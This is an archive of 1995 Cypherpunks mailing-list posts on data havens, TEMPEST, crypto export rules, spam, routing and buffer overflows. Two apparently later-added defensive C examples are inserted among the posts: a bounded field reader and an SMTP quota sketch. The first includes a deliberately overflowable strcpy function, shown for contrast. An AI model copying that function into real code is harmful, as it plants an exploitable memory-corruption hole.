From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Wed, 18 Jan 95 03:27:49 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <199501180700.XAA14684@netcom2.netcom.com>
Message-ID: <9501181127.AA24624@toad.com>
MIME-Version: 1.0
Content-Type: text


> 
> The comments about data havens have been interesting to read. Being

[ .. ]

> Yes, this is the way to go. The data havens have a location that is a
> public key in cyberspace. Think of it as one entity placing an
> anonymous, untraceable classified ad in a newspaper, readable by many,
> and others placing ads in response. A two-way communication channel is
> thus opened up, without regard for the physical location of each, the
> nature of the communication, the data to be transferred, etc.
> 
> All of that is just detail.

Hmmm... then why use a data haven at all?  Split the file into small
pieces, encrypt each and post each piece in newsgroups (the pieces may
even be posted as small garbles of data in sigs?).  When you need to 
recover the file check sites which archive those newsgroups.

Just a thought. It's probably quite doable for small files.

Another idea: use encryption/secret sharing combined with steganography
and upload copies of the said files to various ftp-sites or BBS's. (It
may be that this is more secure than data havens, since few SysAdmins
would bother checking for steganographically hidden files...)

> 
> --Tim May

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 07:21:06 PST
To: cypherpunks@toad.com
Subject: TEMPEST
Message-ID: <199501181520.AB24570@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I know, it's a little bit outside the normal realm of discussion, but...

The Cyphernomicon talks about a proposed, early Cypherpunk project that
dealt with TEMPEST/VanEck monitoring.  Did anyone carry this out beyond the
idea stage?  All I ever seem to see is "theory" and "hear-say" on this topic
(and the original VanEck article appears dated and incomplete).

I noticed the Consumertronics (John Williams in Alamogordo, New Mexico)
catalog has an assembled device that will work with EGA to SVGA monitors.
$3,995 seems a bit pricey though (or is it).  Has anyone had dealings with
Consumertronics in the past?

Replies directly back to me if this is a waste of bandwidth for the rest of
the list.

Thanks...

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan <djw@pentagon.io.com>
Date: Wed, 18 Jan 95 05:22:05 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <9501172240.AA05908@warp.mcom.com>
Message-ID: <199501181321.HAA04672@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Marc, isn't it possible (legally) to deliver products with a replaceable 
>> encryption library (dll). Delivery with a 40-bit key DLL. The user has 
>> the option to install a dll with a different keysize. Somewhat like 
>> winsock....
>
>
>Actually, it's probably worse than you think:
>
>There are govt's out there that won't let you import code that is
>"encryption ready". You must prove that your software is tamper proof
>before it can be imported, and tamper proofing means that you can't
>bolt on security. Also, I believe the export laws disallow "plug in"
>security in the US...
>
>The crypto legal world sucks.

Could you clarify the export restriction on "plug and play" encryption ready
products?  I am about to embark on a project that I want to be distributed
freely that would be designed around a generic encryption interface that I
would wrap around a real encryption core such as PGP, etc.  I wanted to include a
BS encryption in the freely distributable package to prevent export woes.  The
project is in design stages now and I don't need this additional headache.

djw

-------------------------------------------------------------
Duncan J Watson                                    djw@io.com
"Sig Quote goes here"                              duncan@hasp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 07:44:09 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
Message-ID: <199501181543.HAA08161@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Michael Handler <grendel@netaxs.com>

   [automatically split and redistribute]
   If the authorities attempt to indict you for possessing illegal
   information / kiddie porn / whatnot, they have to prove that you
   interfered with the automatic redistribution process and examined the
   contents of the submission. If you in fact did not look at the submission,
   they would have a difficult time doing so. 

This is exactly the right kind of approach, I think.  It's more
expensive to implement than a readable-reject filter, but then I
expect a continuum of services.

The key legal point is "interfered with the automatic redistribution
process".  If an operator can point to those fixed properties of a
system which keep the operator ignorant, an opponent trying to prove
otherwise will have a difficult time.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 07:54:12 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <Pine.3.88.9501171208.A21790-0100000@CSOS.ORST.EDU>
Message-ID: <199501181554.HAA08177@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Brian Beattie <beattie@CSOS.ORST.EDU>

   I disagree, one can use e-mail to steal.  E-mail consumes resources,
   resources for which the sender may have no right to use.  

It's not theft if there's no direct benefit to the actor.  It does
consume resources, there's no argument about that.  Note, however,
that the scope of any such resource use is with the message as a bit
sequence; no meaning or interpretation of the content is even
relevant.  That is, the resource use does not relate to the email as
communication, merely as a technical operation.

The question remains whether such resource use can ever be considered
unauthorized.  Certainly it's impolite; that's not at issue.

I argue that if you hook your machine up to the Internet, you've
implicitly authorized people to send you packets -- as many as they
want and of whatever nature as they want.  No service provision I've
ever seen gives any recourse to the end user against the provider for
"bad" packets.

I also think this is the one great flaw in the design of the Internet;
namely, that the sender has all the control over what packets flow
over the net.  A receiver can ask for a slowdown or cessation, but
there's no obligation to do so.  This will be, if anything, the
limiting factor in scalability of the internet.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 08:07:43 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <9501172027.AA24378@firefly.prairienet.org>
Message-ID: <199501181607.IAA08201@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: jalicqui@prairienet.org (Jeff Licquia)

   I'm sure that when your hypothetical remailer comes up and I decide to spam
   you with your own words (now I wouldn't do that, now would I? ;-), your
   sysadmin will be comforted by knowing that it's only ones and zeros filling
   his hard disk.

Why sendmail doesn't have anti-spam protection at this point is beyond
me.  Denial of email service to one user should not deny service to
all others.  I consider broken any email system that crashes a machine
because of a disk partition filling.

When your email provider gave you an account, was there an agreement
as to how much mail you could receive?  If there wasn't, that provider
has no good reason to complain if you receive as much email as
possible.  Merely because someone else decided to send it to you does not
relieve a provider who has agreed to deliver all mail of that
obligation.

Moral: If you operate an email service, don't offer unlimited fixed
price email.

   In the real world, however, there will
   always be problems with "acceptable use" and "abuse", along with the
   additional problems with establishing policy and so on.

"Acceptable use" is shorthand for "It's a little rickety, please don't
play hard."  That is, the technical means to limit the consequences of
abuse were not developed, because everyone was willing to play nice.
This doesn't scale, and it will have to be fixed before everyone will
put their home computer directly on the net.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 08:13:26 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501180601.BAA16566@bb.hks.net>
Message-ID: <199501181613.IAA08209@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>

   The "spread spectrum" approach might well be indicated for some life-or-
   death key security matters, but the vast majority of PGP users probably
   don't need or want to play Spy vs. Spy with their friends to backup keys.

You use your friends now because off-site storage facilities are not
yet available.  The software for distributed remote backup has yet to
make this operation transparent.

   I recognize that you can't just leave your private keyring lying around
   [physical storage mentioned]

I suspect that most private keys in the future will be held in PCMCIA
cards (initially) and then their smaller replacements.  Backing up a
private key to these allows use of a safe deposit box.

   If it's still "passphrase-protected", an attacker would a) have to know
   what to look for

For scalability, most people will use some standard method, whatever
it is.  This limits the search space of an opponent.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 18 Jan 95 08:52:33 PST
To: Duncan <djw@pentagon.io.com>
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID: <9501180839.ZM8045@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 18,  7:21am, Duncan wrote:
> Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
>
> >> Marc, isn't it possible (legally) to deliver products with a replaceable
> >> encryption library (dll). Delivery with a 40-bit key DLL. The user has
> >> the option to install a dll with a different keysize. Somewhat like
> >> winsock....
> >
> >
> >Actually, it's probably worse than you think:
> >
> >There are govt's out there that won't let you import code that is
> >"encryption ready". You must prove that your software is tamper proof
> >before it can be imported, and tamper proofing means that you can't
> >bolt on security. Also, I believe the export laws disallow "plug in"
> >security in the US...
> >
> >The crypto legal world sucks.
>
> Could you clarify the export restriction on "plug and play" encryption ready
> products?  I am about to embark on a project that I want to be distributed
> freely that would be designed around a generic encryption interface that I
> would wrap around a real encryption core such as PGP, etc.  I wanted to
> include a BS encryption in the freely distributable package to prevent
> export woes.  The project is in design stages now and I don't need this
> additional headache.

Contact a lawyer. It's *really* complicated, and I'm not a lawyer so anything I
tell you could be wrong in some important way, and then you would get really
angry if the govt started chewing you to pieces.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@mcom.com              http://home.mcom.com/people/kipp/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 18 Jan 95 10:00:06 PST
To: cypherpunks@toad.com
Subject: What is this? Anonymous message failed
Message-ID: <v01510108ab4279f1317d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just got back a message from Julf's remailer that my Anonymous message failed
(wrong password). Needless to say, I didn't try to send one through the
remailer. The message it was refering to is the one I sent to the list
earlier. Is this a repeat of the an/na problems we had in the past?

Confused,

- --Lucky

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Not-the-Real MacPGPv262

iQCVAwUBLxzKlQSQkem38rwFAQGaYAP+MGfUN1Vv7SWR2WX0i/XYCYbwOVPTYj1v
Bkld6/rbrzW1SZ+nriQe1OP/ktuoTG5vO281brfIdNA4SQPK6MGf7JdU4AiXL/dQ
UE/nuE+UN60jL1leZngG717QBUTUetfj8npilfgv74EE0QDlStItP+MntrMspl6D
goePQCSfe5Q=
=69Tv
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@CSOS.ORST.EDU>
Date: Wed, 18 Jan 95 10:17:09 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: (none)
In-Reply-To: <199501181554.HAA08177@largo.remailer.net>
Message-ID: <Pine.3.88.9501181026.A29048-0100000@CSOS.ORST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Eric Hughes wrote:

>    From: Brian Beattie <beattie@CSOS.ORST.EDU>
> 
>    I disagree, one can use e-mail to steal.  E-mail consumes resources,
>    resources for which the sender may have no right to use.  
> 
> It's not theft if there's no direct benefit to the actor.  It does

I must assume that the actor who spams me or sends me unsolicited
email or any email for that matter derives some benefit from this 
activity or they would not do it.

> consume resources, there's no argument about that.  Note, however,
> that the scope of any such resource use is with the message as a bit
> sequence; no meaning or interpretation of the content is even
> relevant.  That is, the resource use does not relate to the email as
> communication, merely as a technical operation.

If I make it clear that I do not wish to receive email from an individual
or group and that individual or group continues to send email then I contend
that they are using my resources in a way that I have not authorized.

> 
> The question remains whether such resource use can ever be considered
> unauthorized.  Certainly it's impolite; that's not at issue.
> 
> I argue that if you hook your machine up to the Internet, you've
> implicitly authorized people to send you packets -- as many as they
> want and of whatever nature as they want.

Clearly I disagree.

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Jan 95 07:30:26 PST
To: cypherpunks@toad.com
Subject: NYT on Prodigy Web and Checkfree Suit
Message-ID: <199501181529.KAA07432@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on Prodigy's new offering of World Wide Web
service. 
 
For email copy send blank message with subject:  PRO_www 
 
 
Saul Hansell writes today on Checkfree's new patent and suit against
National Payment Clearing House, a subsidiary of Intuit. 
 
For email copy send blank message with subject:  CHK_sue 
 
 
For twin use subject:  PRO_CHK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 18 Jan 95 10:42:27 PST
To: Duncan <djw@pentagon.io.com>
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID: <Pine.3.89.9501181027.A15911-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



> There are govt's out there that won't let you import code that is
> "encryption ready". You must prove that your software is tamper proof
> before it can be imported, and tamper proofing means that you can't
> bolt on security. Also, I believe the export laws disallow "plug in"
> security in the US...

Central Point Software faced this problem.

So they made the encryption features of their product a free
add on, and posted it on bulletin boards with instructions
not to download unless you were an American citizen.

Needless to say these instructions were ignored, surprise 
surprise.

Of course this strategy only works if your product is
useful without encryption, and the add on is of limited
use without your product.

I believe that Kevin Welch decided on this strategy.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Wed, 18 Jan 95 10:47:11 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
In-Reply-To: <9501181741.AA20208@firefly.prairienet.org>
Message-ID: <9501181850.AA25257@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE jalicqui@prairienet.org (Jeff Licquia):
# Hal wrote:
# >large prime-number factoring.  Contrary to popular belief, the NSA can
# >decrypt public keys of most practical key sizes."  I wonder what this
# >means?  

Just as healthy paranoia, that's worth pursuing.
But I bet the author didn't know what they were talking about. 
 
# Another quote from the article posted elsewhere said that, "PGP, which is
# based on the Diffie-Hellman public-key technology developed in the 1970s..."
# This is technically true, since all public-key work (including RSA) is based
# to some extent on DH.  It could be, however, that the author is confusing

DH uses "discrete log" as the hard problem, and very straightforward
mathematics.

RSA uses "factoring" as the hard problem, and a very clever back door.

How do you decide if one is based on the other?

# public-key technology with Diffie-Hellman public-key in particular, which
# (as I understand it) is not particularly secure.

It's still up in the air, isn't it, whether the discrete log or 
factoring is the harder to crack.   My intuition is they're the
same hard.

I know of no problem with DH that RSA doesn't have similar problems.

			strick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 18 Jan 95 08:03:30 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: (none)
In-Reply-To: <199501181554.HAA08177@largo.remailer.net>
Message-ID: <9501181603.AA01635@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> I argue that if you hook your machine up to the Internet, you've
> implicitly authorized people to send you packets -- as many as they
> want and of whatever nature as they want.  No service provision I've
> ever seen gives any recourse to the end user against the provider for
> "bad" packets.

Be that as it may, people HAVE been kicked off for mischief like
forging routing packets -- and if someone started hosing me down with
any one of several really nasty packet based attacks I'm familiar with
I would expect action to be taken against them.

Remember that degree is important in such instances. You are allowed
to shine a flashlight at your neighbor's house -- you aren't allowed
to shine a fifty megawatt laser. Degree counts.

> I also think this is the one great flaw in the design of the Internet;
> namely, that the sender has all the control over what packets flow
> over the net.  A receiver can ask for a slowdown or cessation, but
> there's no obligation to do so.  This will be, if anything, the
> limiting factor in scalability of the internet.

I doubt it. It really hasn't proved to be an actual problem thus
far. If anything, the limiting factor on scalability is the fact that
the net has no locality of reference, which is making routing design
harder and harder. Routing is currently THE big unsolved problem on
the net -- something outsiders to the IETF rarely suspect, because the
engineers have been faking it so well for so long. Unfortunately, all
the good solutions to the routing problem are mathematically
intractable -- and the practical ones are leading to bad potential
long term problems...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 18 Jan 95 11:12:04 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: (none)
In-Reply-To: <9501181603.AA01635@snark.imsi.com>
Message-ID: <Pine.3.89.9501181033.A15911-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes says:
> > I argue that if you hook your machine up to the Internet, you've
> > implicitly authorized people to send you packets -- as many as they
> > want and of whatever nature as they want.  No service provision I've
> > ever seen gives any recourse to the end user against the provider for
> > "bad" packets.
 
On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> Be that as it may, people HAVE been kicked off for mischief like
> forging routing packets -- and if someone started hosing me down with
> any one of several really nasty packet based attacks I'm familiar with
> I would expect action to be taken against them.

Unix is broken.  Windows and DOS are fragile and under construction.

Servers should have built in limits, that cause them to spit back
packets from unknown clients that are unreasonable or strain the
system.

For example an SMTP server should have a default limit on volume
per address and per client, with the user being able to vary
such limits for particular clients or addresses -- trusted or
hostile clients.

At present most unix utilities have arbitrary fixed length internal
buffers for processing variable length fields.  If you overflow 
the buffer by sending pathological data you will crash the system.  
If you know machine code, and you overflow the buffer with 
carefully chosen data then instead of a random crash you can
get the server to do some particular unexpected thing -- for
example the internet worm caused the server to execute a
file that the mail server had just received.

This is one of many bugs that make attacks possible.

This is a bug.  It can and regularly does crash your
system and cause loss of data even if nobody attacks.

Every flaw in the system causes more havoc by accident
than it does by malice.  The correct solution is not
to create institutions capable of dealing effectively
with hostile acts.   The big problem is bugs that urgently
need fixing.

Now even if all the bugs were fixed some really evil
packet based attacks are still possible, in which case
social action -- cutting the connectivity of a host
that generates bad packets -- is still necessary, but 
again bad packets are more common by malfunction
than by malice.

> I doubt it. It really hasn't proved to be an actual problem thus
> far. If anything, the limiting factor on scalability is the fact that
> the net has no locality of reference, which is making routing design
> harder and harder. Routing is currently THE big unsolved problem on
> the net -- something outsiders to the IETF rarely suspect, because the
> engineers have been faking it so well for so long. Unfortunately, all
> the good solutions to the routing problem are mathematically
> intractable -- and the practical ones are leading to bad potential
> long term problems..

This is inaccurate.  Optimal solutions to the routing problem are
mathematically intractable.  Tolerable solutions are mathematically
tractable.  For realistic routing problems, tractable approximations
are only worse than an optimal solution by a modest factor.

There are real world problems where tractable approximations
are not good enough, but routing is not one of them.

Of course I am sure Perry is correct when he says that
the tractable approximations that we are currently using 
fail to scale, but this is not a fundamental unsolved 
problem in mathematics -- it is merely yet another bug.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we  
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com

               http://www.catalog.com/jamesd/ 
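
The fixed-buffer bug described in the message above, shown beside a bounded reader. This is an added example, not code from the post or from any mail server; FIELD_CAP, read_field_unsafe, read_field and the status names are hypothetical, and a CRLF-terminated field is an assumption.

```c
#include <stddef.h>
#include <string.h>

#define FIELD_CAP 64   /* the "arbitrary fixed length internal buffer" */

enum field_status { FIELD_OK = 0, FIELD_TOO_LONG, FIELD_INCOMPLETE, FIELD_BAD_BYTE };

/* The pattern the message describes, shown for contrast only and never
 * called here: the copy length is chosen by the sender, not by the buffer,
 * so any field of FIELD_CAP bytes or more writes past the end of out. */
void read_field_unsafe(const char *in, char out[FIELD_CAP])
{
    strcpy(out, in);
}

/* Bounded reader: copies one CRLF-terminated field from the first in_len
 * bytes of in into out (capacity out_cap, always NUL-terminated).
 * On FIELD_OK, *consumed is the number of input bytes used, CRLF included.
 * Oversize input is rejected as soon as it cannot fit, never truncated,
 * so a long field can neither overflow the buffer nor be silently cut. */
enum field_status read_field(const unsigned char *in, size_t in_len,
                             char *out, size_t out_cap, size_t *consumed)
{
    size_t i;

    *consumed = 0;
    if (out_cap == 0)
        return FIELD_TOO_LONG;
    out[0] = '\0';

    for (i = 0; i < in_len; i++) {
        unsigned char c = in[i];

        if (c == '\r') {
            if (i + 1 >= in_len)
                return FIELD_INCOMPLETE;     /* LF has not arrived yet */
            if (in[i + 1] != '\n')
                return FIELD_BAD_BYTE;       /* bare CR inside a field */
            /* Every payload byte before i passed the size check below,
             * so i < out_cap and the terminator fits. */
            memcpy(out, in, i);
            out[i] = '\0';
            *consumed = i + 2;
            return FIELD_OK;
        }
        if (c == '\0' || c == '\n')
            return FIELD_BAD_BYTE;           /* embedded NUL or bare LF */
        if (i + 1 >= out_cap)
            return FIELD_TOO_LONG;           /* no room left for the NUL */
    }
    return FIELD_INCOMPLETE;                 /* no terminator seen yet */
}
```

On FIELD_TOO_LONG or FIELD_BAD_BYTE the caller should reject the request and discard input up to the next line end or close the connection, rather than retry with the same bytes.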





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 11:17:31 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
In-Reply-To: <199501181520.AB24570@mail.eskimo.com>
Message-ID: <199501181916.LAA09619@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

> The Cyphernomicon talks about a proposed, early Cypherpunk project that
> dealt with TEMPEST/VanEck monitoring.  Did anyone carry this out beyond the
> idea stage?  All I ever seem to see is "theory" and "hear-say" on this topic
> (and the original VanEck article appears dated and incomplete).

We all need to remember that projects are not "proposed" and then
"assigned." That is, projects only get done when someone decides to
personally champion that project.

I'm sure this is obvious, but maybe not.

The TEMPEST thread comes up now and then, but nobody (at least to my
knowledge) has gotten interested enough to pursue it. Before anyone
ever asks why _others_ are not doing work in this area, they should
look to themselves. (Not meant to be a critical remark directed at
Joel, just a general comment that the only things that get done are
the things that get done.)

> I noticed the Consumertronics (John Williams in Alamogordo, New Mexico)
> catalog has an assembled device that will work with EGA to SVGA monitors.
> $3,995 seems a bit pricey though (or is it).  Has anyone had dealings with
> Consumertronics in the past?

TEMPEST has very little to do with Cypherpunks goals, actually. First,
buying such a gadget, tweaking it, exploring capabilities, etc., would
lead to what? The ability to park a van in front of someone's house
and--maybe--monitor their screens? We already know this is possible.
(You all knew that, didn't you?)

I'm not saying it wouldn't be useful to have someone on our list who
has a lot of experience in this area, but mainly just for the
"background" it would provide.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 09:21:49 PST
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <9501181721.AA13078@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Eric wrote:
>   From: jalicqui@prairienet.org (Jeff Licquia)
>
>   I'm sure that when your hypothetical remailer comes up and I decide to spam
>   you with your own words (now I wouldn't do that, now would I? ;-), your
>   sysadmin will be comforted by knowing that it's only ones and zeros filling
>   his hard disk.
>
>Why sendmail doesn't have anti-spam protection at this point is beyond
>me.  Denial of email service to one user should not deny service to
>all others.  I consider broken any email system that crashes a machine
>because of a disk partition filling.

Yes, this is true.  Even if it didn't crash the system, however, it could
have the effect of disabling mail service, either to all users on the system
or to the particular user being spammed (depending on the robustness of the
system).  Though it's not as likely to anger the sysadmin, it is more likely
to anger the spamee.  More to the point, if the spammer uses random
anonymous remailers to protect his/her identity, there's no good way to
prevent this attack short of installing a filter of some kind or refusing
mail from remailers.  If no one will accept mail from the anon remailers,
what good are they?

>When your email provider gave you an account, was there an agreement
>as to how much mail you could receive?  If there wasn't, that provider
>has no good reason to complain if you receive as much email as
>possible.  Merely because someone else decided to send it to you does not
>relieve a provider who has agreed to deliver all mail of that
>obligation.

I thought most usage agreements had something in them about reasonable limits
and such.  On that basis, a provider could choose to auto-kill spam if they
thought it "unreasonable".  This of course assumes that providers always
abide by well-defined rules and are not arbitrary in any way. :-)

(As to my personal situation, since you asked: Prairienet has quotas.)

>   In the real world, however, there will
>   always be problems with "acceptable use" and "abuse", along with the
>   additional problems with establishing policy and so on.
>
>"Acceptable use" is shorthand for "It's a little rickety, please don't
>play hard."  That is, the technical means to limit the consequences of
>abuse were not developed, because everyone was willing to play nice.
>This doesn't scale, and it will have to be fixed before everyone will
>put their home computer directly on the net.

It's been my experience up to this point that for each security safeguard
put in place, there will be someone somewhere that will find a way to breach
it.  Perhaps strong crypto will serve to end that trend; I doubt it, though,
due to the horrid legal situation.  Thus I doubt that written,
human-enforced policy will disappear anytime soon.  Not an ideal situation,
I must admit.
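
A sketch of the limits discussed in this thread: a default volume limit per client and per recipient address, which the operator can raise for a trusted peer or set to zero for a hostile one, so that flooding one mailbox does not deny service to the others. This is an added example, not code from any poster or from sendmail; every name in it is hypothetical, and the one-hour window, byte limits and 192.0.2.x / example.org values are constructed.

```c
#include <string.h>

#define MAX_KEYS   128      /* tracked clients or addresses per table */
#define KEY_LEN    64
#define WINDOW_SEC 3600L    /* accounting window (assumed: one hour) */

enum verdict { ACCEPT = 0, REJECT_CLIENT, REJECT_ADDRESS, REJECT_UNTRACKED };

struct quota {
    char key[KEY_LEN];      /* client IP or recipient address */
    long limit;             /* bytes allowed per window */
    long used;              /* bytes accepted in the current window */
    long window_start;      /* seconds */
};

struct quota_table {
    struct quota q[MAX_KEYS];
    int  count;
    long default_limit;     /* applied to keys seen for the first time */
};

void quota_init(struct quota_table *t, long default_limit)
{
    memset(t, 0, sizeof *t);
    t->default_limit = default_limit;
}

/* Find the entry for key, creating it with the default limit if absent.
 * Returns NULL for an empty or oversize key, or when the table is full. */
static struct quota *quota_get(struct quota_table *t, const char *key, long now)
{
    size_t n = strlen(key);
    int i;

    if (n == 0 || n >= KEY_LEN)
        return NULL;
    for (i = 0; i < t->count; i++)
        if (strcmp(t->q[i].key, key) == 0)
            return &t->q[i];
    if (t->count == MAX_KEYS)
        return NULL;
    memcpy(t->q[t->count].key, key, n + 1);
    t->q[t->count].limit = t->default_limit;
    t->q[t->count].used = 0;
    t->q[t->count].window_start = now;
    return &t->q[t->count++];
}

/* Operator override: a large limit for a trusted peer, 0 for a hostile one. */
int quota_set_limit(struct quota_table *t, const char *key, long limit)
{
    struct quota *q = quota_get(t, key, 0);

    if (q == NULL || limit < 0)
        return -1;
    q->limit = limit;
    return 0;
}

static void roll_window(struct quota *q, long now)
{
    if (now - q->window_start >= WINDOW_SEC) {
        q->used = 0;
        q->window_start = now;
    }
}

/* Decide whether to take a message of size bytes from client for rcpt.
 * Both limits are checked before either counter is charged, so a message
 * refused for one reason does not eat into the other budget. Anything that
 * cannot be tracked is refused (fail closed); a production table would
 * evict idle entries instead of filling up. */
enum verdict mail_offer(struct quota_table *clients, struct quota_table *addrs,
                        const char *client, const char *rcpt,
                        long size, long now)
{
    struct quota *c = quota_get(clients, client, now);
    struct quota *a = quota_get(addrs, rcpt, now);

    if (c == NULL || a == NULL || size < 0)
        return REJECT_UNTRACKED;
    roll_window(c, now);
    roll_window(a, now);
    if (size > c->limit - c->used)
        return REJECT_CLIENT;
    if (size > a->limit - a->used)
        return REJECT_ADDRESS;
    c->used += size;
    a->used += size;
    return ACCEPT;
}
```

A limit keyed on the sending client does little against the case raised above, where the flood arrives through many remailers; the per-address limit is the one that bounds what a single mailbox can cost the system.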





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 09:41:44 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <9501181741.AA20208@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
>This, from a sidebar, is really surprising:  "In contrast, public keys
>allow the overt publication of an encryption key, because decryption keys
>can only be derived through a mathematically difficult process, such as
>large prime-number factoring.  Contrary to popular belief, the NSA can
>decrypt public keys of most practical key sizes."  I wonder what this
>means?  If it is a claim that the NSA can factor 1024 bit moduli that
>would certainly come as a big surprise.  If they are saying that they can
>do 512 bits that would be more believable although of interest.  It is
>strange that the author would include a statement like this without
>attribution or evidence.

Another quote from the article posted elsewhere said that, "PGP, which is
based on the Diffie-Hellman public-key technology developed in the 1970s..."
This is technically true, since all public-key work (including RSA) is based
to some extent on DH.  It could be, however, that the author is confusing
public-key technology with Diffie-Hellman public-key in particular, which
(as I understand it) is not particularly secure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Wed, 18 Jan 95 08:47:35 PST
To: cypherpunks@toad.com
Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity]
Message-ID: <9501181647.AA13819@toast>
MIME-Version: 1.0
Content-Type: text/plain



Return-Path: <rre-request@weber.ucsd.edu>
Resent-Date: Tue, 17 Jan 1995 18:00:48 -0800
Date: Tue, 17 Jan 1995 18:00:02 -0800
